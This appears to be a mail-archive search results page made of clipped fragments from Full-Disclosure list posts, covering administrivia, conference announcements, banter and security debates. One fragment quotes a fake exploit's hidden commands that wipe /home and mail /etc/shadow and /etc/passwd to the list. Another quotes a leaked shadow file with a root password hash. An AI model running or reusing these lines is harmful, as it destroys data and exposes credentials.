Julius hit the nail on the head here. Transaction malleability is not some
heretofore undiscovered bug in the Bitcoin implementation. It was a known
entity long ago, and presumably with the creator(s) awareness. It really isn’t
a problem itself; it’s perfectly mitigable with the correct
Please unsubscribe. Address to be inactive.
-Original Message-
From: Full-Disclosure [mailto:full-disclosure-boun...@lists.grok.org.uk] On
Behalf Of ESNC Security
Sent: Monday, May 6, 2013 10:31 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] [ESNC-2013-005] Remote
Please unsubscribe. Address to be inactive
-Original Message-
From: Full-Disclosure [mailto:full-disclosure-boun...@lists.grok.org.uk] On
Behalf Of MustLive
Sent: Monday, May 6, 2013 4:45 PM
To: submissi...@packetstormsecurity.org; full-disclosure@lists.grok.org.uk;
1337 Exploit
Email address to be inactive. Please unsubscribe.
-Original Message-
From: Full-Disclosure [mailto:full-disclosure-boun...@lists.grok.org.uk] On
Behalf Of SEC Consult Vulnerability Lab
Sent: Tuesday, May 7, 2013 12:57 AM
To: bugtraq; full-disclosure@lists.grok.org.uk
Subject:
You're correct that time machines don't exist yet. However, this is
proof that they'll be invented in the next five months.
Stay tuned!
Mike Bann wrote:
I highly doubt you reported this to Mozilla in September of 2009. I
don't think time machines like that exist yet, but i'd be pleased to be
Ivan . wrote:
The BBC hacked into 22,000 computers as part of an investigation into
cybercrime but the move quickly backfired, with legal experts claiming
the broadcaster broke the law and security gurus saying the experiment
went too far.
that supporting the bot-runners is a bad idea, but I don't think
that paying them for their bots puts them on equal footing.
(In my humble opinion, of course)
Ron
--
http://www.skullsecurity.org/
___
Full-Disclosure - We believe in it.
Charter: http
For those of you that may be interested:
*Call for Papers Hack.lu 2008*
The purpose of the hack.lu convention is to give an open and free playground
where people can discuss the implication of new technologies in society.
hack.lu is a balanced mix convention where technical and non-technical
to FD since some date.
2) Covert communication, or that the exploits were really secret
messages between t3rr0ri$ts or something.
I'm sure there exists a motive beyond just spamming us to be
annoying. Any one have any new ideas, or good arguments for either of
the above two ideas?
Ron
, if the site is malicious,
better the app die and dump then allow one to prceed to inflict harm upon
ones self?
Thanks,
Ron DuFresne
--
Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back. --B.B. King
***testing, only testing, and damn good
Can anbody tell me if there is a simple CTF ruleset that maybe has its
own accompanying distro that others can play?
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia -
Hi Tim,
You make a great point.
Ron Jennings, NCIE SSP
Chaser Security- A Microsoft Partner
Cell:559.360.2340 24hr.customer service
VOIP:562.365.1295
From: Tim [EMAIL PROTECTED]To: "pdp (architect)" [EMAIL PROTECTED]CC: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hi,
Hadmut Danisch wrote:
Your assumption is false here. The kernel maintainers DO NOT say this:
Read the README file, it does not contain any statement that you do
not have to compile as root. They silently explain how to compile if
you are not
, somewhere is a pc with a vulnerable application, guess where it
is and you can own it. Oh, but, pay me big bucks first so I can eat well
for a day or two.
Thanks,
Ron DuFresne
--
Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back. --B.B. King
This is my last ever Full-Disclosure post...
...and there was much rejoicing.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. If nothing comes
up, perhaps I'll generate my own tables, but I'd rather not spend months
doing it.
Thanks,
Ron
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia
to consider is that a mere user level shell likely lacks
privs to do some of the nasties referenced in some of these posts. thus,
the friend would not oonly have to allow shell access, but also give away
root on the server as well.
Just a minor point.
Thanks,
Ron DuFresne
--
Sometimes you get
Aha, the C killed me. That's exactly why I should never trust my
memory! :)
Thanks for putting my mind at ease!
Ron
B Potter wrote:
shmoo has no c. that was the first problem :)
Also, we are right now in the process of migrating the tables to a new
server. Another 48 hours and you
://www.microsoft.com
APPENDIX B. - References
NONE
CONTACT:
*ron [EMAIL PROTECTED]
*1-888-LOL-WHAT
*CISSP GSAE CCE CEH CSFA GREM SSP-CNSA SSP-MPA GIPS GHTQ GWAS
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
checking if this address works on the list
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
teh kids wrote:
i suppose its about time i passed this on.
http://www.geocities.com/teh_kids/index.html
http://www.geocities.com/teh_kids/index.html
it reminds me of the windoze 95 days, not seen _anything_ like this for
a long long time.
In case anybody cares, this does NOT work on
Some versions of Nessus can log in through SSH and check the system
locally. I'm unsure if Retina can do that, but it wouldn't surprise me.
Joshua Russel wrote:
It is a local vulnerability, then how does Retina claims to scan it remotely?
On 12/13/05, Advisories [EMAIL PROTECTED] wrote:
I was also unable to replicate it, on Firefox 1.5 i386 Linux EN
[EMAIL PROTECTED] wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
nor a fake , nor you really dont know what is a buffer overflow, but for
sure here on my firefox 1.5 EN, the client is much longuer to load to
the next boot
, be careful! As I said, I nearly got burnt by this, luckly I
noticed it before anybody malicious did.
Ron
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http
I'm hosting a bit of a hoax this week (to celebrate December Fool's Day,
not to be confused with April Fool's Day, which is real).
What I need is some log files that seem to indicate an attack. I
already posted some FTP brute-force-looking stuff, but it was pretty weak.
Anybody got some
Calling someone else a kid
just because he has a different mindset or vision is simply childish.
Am I the only one who sees a little bit of irony there?
___
Full-Disclosure - We believe in it.
Charter:
I took about 2 minutes out of my life several months ago and created
rules in Thunderbird which put all those update messages into a special
folder that I ignore. It wasn't incredibly hard to do, and now I'm
happy AND I didn't have to complain on the list! Win-win!
Rembrandt wrote:
Could
, let alone that CISSP is the only real
qualification for the claim.
Thanks,
Ron DuFresne
--
Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back. --B.B. King
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D
Hi,
For those of you that may be interested. I got this in my inbox.
hack.lu 2005
The purpose of the hack.lu convention is to give an open and free
playground where people can discuss the implication of new
technologies
(mainly security) on society. hack.lu is a balanced convention where
For those of you that are interested in :hack.lu 2005The purpose of the hack.lu convention is to give an open and freeplayground where people can discuss the implication of new technologies
(mainly security) on society. hack.lu is a balanced convention wheretechnical and non-technical people can
clients towards matt's
outdated and insecure versions, despite his referecnes and links to the
moere secured version of his and other web based scripts that can be
gotten from:
http://nms-cgi.sourceforge.net/scripts.shtml
Unless one is carefull they often get what they paid for
Thanks,
Ron
the current
tools that nasty boys and grils are using, does it not? If their tools
reply upon poorly written code, then replacing it with far better code
makes their efforts kinda nill, yes?
Thanks,
Ron DuFresne
Thanks..
On 9/12/05, Ron DuFresne [EMAIL PROTECTED] wrote:
On Mon, 12 Sep 2005
and the
whole set fo nearly bi monthly threads that covers it and it's variants in
detail.
Yet, where one can limit, limiting access to sshd these days is prefered,
as openssl and the openssh code tend to be quite the problem with
maintainance, almost like the 90's with ftpd and sendmail
Thanks,
Ron
http://www.ranum.com/security/computer_security/papers/a1-firewall/
Thanks,
Ron DuFresne
On Sat, 27 Aug 2005, [EMAIL PROTECTED] wrote:
=
ORIGINAL MESSAGE:
-
Date: Sat, 27 Aug
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
ngrep and netsed are useful.
[EMAIL PROTECTED] wrote:
Hi all,
I forget the name of a tool that can be used to intercept TCP packet and
allow you to modify the packet before it was
sent out. Basically the tool open 2 ports, one for listening and
of bucks, and will continue to line
many pockets for a long time as folks play into the latest and greatest
buzzword of the week/month/year, but when it comes to security, a little
extrapolation of the basics is the real key to any small sense of secure.
Thanks,
Ron DuFresne
On Mon, 22 Aug 2005, Todd
On Fri, 19 Aug 2005, Nick FitzGerald wrote:
[EMAIL PROTECTED] to Ron DuFresne:
Perhaps it does realte considering the above and considering that the unix
world learned many of the evils of RCP services over ten years ago that
seem to hit the M$ realm every few months, repeatedly
it was the QA group..it doesn't
really matter. They go the worm because they were not patched.
And because they didn't properly filter port 445 is my understanding.
Unpatched systems behind FW's that fliter 445 were untouched.
Thanks,
Ron DuFresne
--
Sometimes you get the blues because your
, with taxpayers footing the bill, but that's life in gov
settings and more so perhaps in state and county govs that lack the
auditing controls like the GAO smirk
Thanks,
Ron DuFresne
--
Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back. --B.B. King
On Fri, 29 Jul 2005, KF (lists) wrote:
Trying to Stifle information is a real dickhead thing to do also...
I'm just waiting for someone to toss the DMCA into all of this. =]
CERT and DHS are bigger cards in the game then DMCA.
Thanks,
Ron DuFresne
--
Sometimes you get the blues because
be retired and all this equipment replaced by the
time IPv6 becomes standard the threat is not as great then as it was first
made out to be then, correct?
Thanks,
Ron DuFresne
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk
On Fri, 29 Jul 2005 [EMAIL PROTECTED] wrote:
On Fri, 29 Jul 2005 16:38:26 CDT, Ron DuFresne said:
being that we'll all be retired and all this equipment replaced by the
time IPv6 becomes standard the threat is not as great then as it was first
made out to be then, correct?
Part
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hmm, I'm noticing a pattern.
Warning: don't download exploits from any sites that have an 'o'
replaced with a '0'! The 0 obviously makes them less secure, or
something.
[EMAIL PROTECTED] wrote:
Hackers may be at risk!
It has come to our
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
_Linux_ doesn't have a version 10, either. Linux IS the kernel, which
the versions are 2.x (2.4.* and 2.6.* usually).
Maybe you're talking about a specific distribution? In which case,
that's a pretty inconsistant numbering system to use since Red
to be doing maintainance or
working indirectly from home as usual
Thanks,
Ron DuFresne
Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back. --B.B. King
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just
reports it as a Friday here also, damn, now I have to drive the 45
miles in for sure!
Thanks,
Ron DuFresne
--
Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back. --B.B. King
***testing, only testing, and damn good at it too!***
OK, so you're
let me
know. I'd be interested how this can be exploited.
-Ron
// Written by Ron [EMAIL PROTECTED]
// Friday, May 13, 2005
//
// This is a very weak demonstration of Gaim 1.2.1's stack overflow
vulnerability
// when processing email addresses. What this basically does is segfault you
when
lmao
root = you
kfinisterre = are
dotslash = so
mandark = lame
dognutz = for
elguapo = cracking
m0ssimo = this
KF (lists) wrote:
root:$1$WO0cTkiq$4x/Of2KBx2HRwv/OXmggv1:12741:0:9:7:::
daemon:*:12741:0:9:7:::
bin:*:12741:0:9:7:::
sys:*:12741:0:9:7:::
sync:*:12741:0:9:7:::
The ONLY posts I don't like are posts like that, complaining about the
list. Like somebody else said, the rest of this list provides great
comic relief!
Javi Polo wrote:
On Apr/20/2005, Day Jay wrote:
You are wrong again, it's Smashing the Stick you
moron. Not smashing the stack. Ask anyone
haha, nice:
/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe
cat /etc/shadow |mail full-disclosure@lists.grok.org.uk
cat /etc/passwd |mail full-disclosure@lists.grok.org.uk
lol @ anybody who does it.
Day Jay wrote:
/* Proof of concept code
Please don't send us e-mails
asking us how to hack
it.
Actually, at least in the US, there is a law dang I forget what it's
called that would make this illegal and subject one to prison time...
Thanks,
Ron DuFresne
--
Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back. --B.B. King
Well, the only reply to that would be:
Since the catholic church say God exists and they have a vested interest
in the matter they must be lying. Therefore God doesn't exist. I rest
my case.
Of course I'd be skeptical of their proof. If the Republicans came out
with proof that Democrats
memories of such events, unless directly affected by the event.
Thanks,
Ron DuFresne
--
Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back. --B.B. King
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't
comapnies choice-point
obatined their data from? Quite often putting pressure on company C is
not a straight forward matter for the public at large.
Thanks,
Ron DuFresne
--
Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back. --B.B. King
such
things are done is another problem altogether...
Of course, I'm not sure you understand what tripwire is or does, further
research might be in order.
Thanks,
Ron DuFresne
--
Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back. --B.B. King
point presentations that mgt loves. Course as a
techie, I'd want to see the product working in a live setup prior to
making a perhaps costly blunder.
Thanks,
Ron DuFresne
--
Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back. --B.B. King
Nor to read the whole annoucement Administrivia about the change in
hosting sites and how to change your passwd and how to fix you settings
for the list. The reading impaired should just unsubscribe.
Thanks,
Ron DuFresne
On Wed, 9 Mar 2005 [EMAIL PROTECTED] wrote:
I tend to agree though
57 matches
Mail list logo